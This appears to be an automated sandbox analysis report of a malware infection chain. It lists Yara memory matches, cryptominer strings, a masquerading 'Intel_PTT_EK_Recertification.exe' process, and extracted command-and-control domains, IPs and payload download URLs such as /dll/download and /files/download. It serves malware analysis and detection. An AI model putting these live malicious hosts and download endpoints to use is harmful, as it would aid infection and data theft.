Source: Yara match | File source: 00000033.00000002.2996017964.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2597932225.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000033.00000002.2933758160.0000000000BE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2598240255.000000014040B000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000033.00000002.2995871768.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000033.00000002.2933758160.0000000000BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000024.00000002.2597232510.0000000000DE9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Intel_PTT_EK_Recertification.exe PID: 7772, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2368, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 7580, type: MEMORYSTR
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: cryptonight/0
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: Intel_PTT_EK_Recertification.exe, 00000022.00000003.2591781402.00000237117F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdb source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\_work\1\s\src\StoreInstaller\obj\Release\net472\StoreInstaller.pdbSHA256\u source: 4268204ace.exe, 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000000.2721445578.00000220D3472000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdb source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\danie\source\repos\NewText\NewText\obj\Debug\NewTextV2.pdbdj~j pj_CorExeMainmscoree.dll source: 4268204ace.exe, 0000000F.00000000.2555729362.00000000007D2000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe | Directory queried: number of queries: 1001
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Code function: 11_2_001D7978 FindFirstFileW,FindFirstFileW,free,11_2_001D7978
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe | Code function: 11_2_001D881C free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free,11_2_001D881C
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\main\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\main\extracted
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe | Code function: 4x nop then jmp 02B03677h 15_2_02B0347A

Networking

Source: Malware configuration extractor | URLs: sustainskelet.lat
Source: Malware configuration extractor | URLs: sweepyribs.lat
Source: Malware configuration extractor | URLs: crosshuaht.lat
Source: Malware configuration extractor | URLs: rapeflowwj.lat
Source: Malware configuration extractor | URLs: necklacebudi.lat
Source: Malware configuration extractor | URLs: discokeyus.lat
Source: Malware configuration extractor | URLs: energyaffai.lat
Source: Malware configuration extractor | URLs: aspecteirs.lat
Source: Malware configuration extractor | URLs: grannyejh.lat
Source: Malware configuration extractor | URLs: https://steamcommunity.com/profiles/76561199809363512
Source: Malware configuration extractor | IPs: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | File created: wNFfgZ1.exe.5.dr
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: unknown | Network traffic detected: IP country count 10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0005E0C0 recv,recv,recv,recv,0_2_0005E0C0
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.css
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://.jpg
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/K
Source: 0577f55121.exe, 0000002E.00000003.3202086239.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3228694024.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005562000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005562000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/download
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/key
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/keyW
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/dll/keyhqos.dll.mui
Source: 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/download
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3146323550.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3176254742.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/download1
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadK
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadM
Source: 0577f55121.exe, 0000002E.00000003.3228694024.0000000005552000.00000004.00000020.00020000.00000000.sdmp, 0577f55121.exe, 0000002E.00000003.3202086239.0000000005552000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.156.73.23/files/downloadc
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: powershell.exe, 00000028.00000002.2650660528.0000000008A62000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148185991.00000000004FE000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3060235969.00000000005B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/StoreAppList.Light.png
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/StoreLogo.Light.png
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/Theme/Light.xaml
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://defaultcontainer/StoreInstaller;component/Resources/app.Light.ico
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://e12564.dspb.akamaiedge.net
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6ACAD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000002D.00000003.2733073587.000001EE6AD67000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foo/Resources/StoreAppList.Light.png
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foo/Resources/StoreLogo.Light.png
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foo/Resources/app.Light.ico
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D5708000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foo/bar/resources/app.light.ico
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foo/bar/resources/storeapplist.light.png
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://foo/bar/resources/storelogo.light.png
Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.com
Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, 4268204ace.exe, 0000000F.00000002.2729833635.0000000002BDA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://github.comd
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: powershell.exe, 00000020.00000002.2598419733.0000000006387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.comd
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/StoreInstaller.Models
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.datacontract.org/2004/07/StoreInstaller.ModelspXu
Source: powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 4268204ace.exe, 0000000F.00000002.2729833635.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D551B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000020.00000002.2595289423.0000000005475000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: 9bc5ebea0e.exe, 00000007.00000000.2504593423.0000000000423000.00000002.00000001.01000000.00000009.sdmp | String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: powershell.exe, 00000028.00000002.2631755685.00000000051E5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D549F000.00000004.00000800.00020000.00000000.sdmp, 5119130eb96345a8a13dc770d0f33571.exe, 0000002C.00000002.2786097860.00000220D57CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.w3.oh
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: 77594b3442.exe, 00000031.00000003.3012434030.00000000052D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000020.00000002.2595289423.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2631755685.0000000005091000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: 77594b3442.exe, 00000031.00000003.3040740995.000000000053B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000028.00000002.2642561965.00000000060F8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: 9c2981f3e5.exe, 0000002A.00000003.2686987170.0000000007370000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 77594b3442.exe, 00000031.00000003.3075295928.0000000000515000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/
Source: 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/6
Source: 77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000515000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/U
Source: 77594b3442.exe, 00000031.00000003.3040855267.00000000052A9000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148807130.00000000052B1000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075295928.0000000000507000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000552000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104470563.000000000056D000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000003.3063570796.000000000056D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api
Source: 77594b3442.exe, 00000031.00000003.3082778417.00000000052AA000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3148640294.00000000052AB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3075604245.00000000052AA000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/api-
Source: 77594b3442.exe, 00000031.00000003.3075295928.0000000000524000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.3137575871.0000000000524000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/apion_pre
Source: 77594b3442.exe, 00000031.00000003.3137575871.0000000000515000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/c
Source: 77594b3442.exe, 00000039.00000003.3063497186.0000000000575000.00000004.00000020.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3104578420.0000000000575000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat/l
Source: 77594b3442.exe, 00000031.00000003.2969030804.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2968852424.00000000052A6000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000039.00000002.3103939592.0000000000549000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/api
Source: 77594b3442.exe, 00000031.00000003.3040855267.00000000052AF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://discokeyus.lat:443/apiK
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 77594b3442.exe, 00000031.00000003.2935489662.00000000052EB000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934403665.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, 77594b3442.exe, 00000031.00000003.2934894948.00000000052EB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 7d28d37061cb43098969a37cf25a380a.exe, 0000002B.00000003.2745507177.000000000079D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://frostman.shop
